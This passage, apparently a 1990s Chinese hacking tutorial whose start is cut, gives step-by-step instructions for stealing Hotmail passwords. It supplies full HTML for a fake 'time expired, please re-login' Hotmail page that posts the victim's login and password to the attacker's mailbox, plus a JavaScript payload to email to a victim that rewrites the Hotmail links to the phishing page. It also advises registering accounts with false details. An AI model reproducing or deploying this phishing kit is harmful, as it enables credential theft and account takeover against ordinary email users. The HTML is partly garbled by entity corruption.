旅娴氖道嵌褚庥没绾问褂闷胀ǖ淖试矗骋籌SP提供的主页空间)通过
Hotmail安全漏洞实现对支持Javascript的浏览器用户进行攻击。而且根本不需要
特别的硬件,就可以绕过Hotmail在8月25日修复的安全漏洞。
资源需求:
* 一台可以访问Internet的计算机
* Netscape Mail或同等的email程序
* Notepad程序或同等的文本编辑器
* 免费主页空间
步骤一:
访问hotmail.com并申请一个免费电子邮件帐号,在注册过程中中必输入有效的联
系资料。;-)
步骤二:
访问Geocities.com并申请免费主页。在此我们选择ybwc用户名,在注册过程中同
样不必输入有效的联系资料,;-) 电子邮件地址除外。电子邮件地址为步骤一中所得到
的电子邮件地址。注册后,我们就在Geocities得到了一个免费电子邮件帐号
(ybwc@geocities.com)
步骤三:
打开Notepad,输入以下文本,并保存为getmsg.htm。然后将此文件上载到我们的
免费主页空间。注意第14行包含了我们在步骤二得到的Geocities帐号(ybwc)。
$#@60;html$#@62;$#@60;head$#@62;$#@60;/head$#@62;
$#@60;body bgcolor="#ffffff" link="#000099" vlink="#000099"$#@62;
$#@60;table border=0 cellpadding=5 cellspacing=5 width=508 height=90%$#@62;
$#@60;tr valign=middle$#@62;$#@60;th colspan=2$#@62;
$#@60;font face="Arial, Helvetica" size="5"$#@62;Were Sorry, We Cannot$#@60;br$#@62;
Process Your Request$#@60;/font$#@62;
$#@60;/th$#@62;$#@60;/tr$#@62;
$#@60;tr valign=middle$#@62;$#@60;td align=center$#@62;
$#@60;font face="Arial, Helvetica" size="3"$#@62;Reason: $#@60;/font$#@62;
$#@60;font face="Arial, Helvetica" size="3" color="#ff0000"$#@62;$#@60;b$#@62;Time
expired. Please re-login.$#@60;/b$#@62;$#@60;/font$#@62;$#@60;br$#@62;
$#@60;font face="Arial, Helvetica" size="2"$#@62;$#@60;a
href="http://www.hotmail.com/errormsg.html"$#@62;(Get more info
regarding error messages here)$#@60;/a$#@62;$#@60;/font$#@62;
$#@60;/td$#@62;$#@60;/tr$#@62;
$#@60;tr valign="middle"$#@62;$#@60;td align="center"$#@62;
$#@60;FORM METHOD=PO br> ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc"
target="_top"$#@62;
$#@60;INPUT TYPE="hidden" NAME="next-url"
VALUE="http://www.hotmail.com"$#@62;
$#@60;INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password"$#@62;
$#@60;table cellpadding="0" cellspacing="5" border="0"$#@62;
$#@60;tr$#@62;$#@60;td$#@62;$#@60;font face="Arial, Helvetica" size="2"$#@62;Login
Name:$#@60;/font$#@62;$#@60;br$#@62;$#@60;input type="text" name="login" size="16"
maxlength="16"$#@62;$#@60;/td$#@62;$#@60;td$#@62;$#@60;font face="Arial, Helvetica"
size="2"$#@62;Password:$#@60;/font$#@62;$#@60;br$#@62;$#@60;input type="password" name="passwd"
size="16" maxlength="16"$#@62; $#@60;input type="submit"
value="Enter"$#@62;$#@60;/td$#@62;$#@60;tr$#@62;
$#@60;/table$#@62;$#@60;/form$#@62;$#@60;/td$#@62;$#@60;/tr$#@62;
$#@60;tr valign=middle$#@62;$#@60;th colspan=2 align=center$#@62;
$#@60;font face="Arial, Helvetica" size="3"$#@62;Return to $#@60;a
href="http://welcome.to/www.hotmail.com" target="_parent"$#@62;Hotmails
Homepage$#@60;/a$#@62;.
$#@60;/font$#@62;$#@60;/th$#@62;$#@60;/tr$#@62;$#@60;/table$#@62;
$#@60;p$#@62;$#@60;img src="http://209.1.112.251/c9698.gif" width=189 height=16
border=0 alt="Copyright 1996-1997"$#@62;
$#@60;/body$#@62;$#@60;/html$#@62;
步骤四:
打开Notepad,输入以下文本,并保存为getmsg.htm。注意第4行包含了我们在
步骤三中建立的getmsg.htm文件的URL。
$#@60;html$#@62;$#@60;head$#@62;$#@60;/head$#@62;$#@60;body$#@62;
$#@60;p$#@62;"Go where you want today" - Blue Adept$#@60;/p$#@62;
$#@60;img
src="javascript:errurl=http://www.because-we-can.com/users/anon/ho
tmail/getmsg.htm;
nomenulinks=top.submenu.document.links.length;
for(i=0;i$#@60;nomenulinks-1;i++){top.submenu.document.links[i].target=
work;
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.doc
ument.links.length;
for(i=0;i$#@60;noworklinks-1;i++){top.work.document.links[i].target=wor
k;
top.work.document.links[i].href=errurl;}"$#@62;
$#@60;/body$#@62;
$#@60;/html$#@62;
步骤五:
将message.htm插入到电子邮件中,并将其发送给攻击目标用户如victim@hotmail.com
步骤六:
在攻击目标用户检查过他的Hotmail帐号和邮件后,打开Geocities邮箱检查邮件。
就会得到含有victim@hotmail.com的ip地址、帐号和口令的电子邮件。
相关文章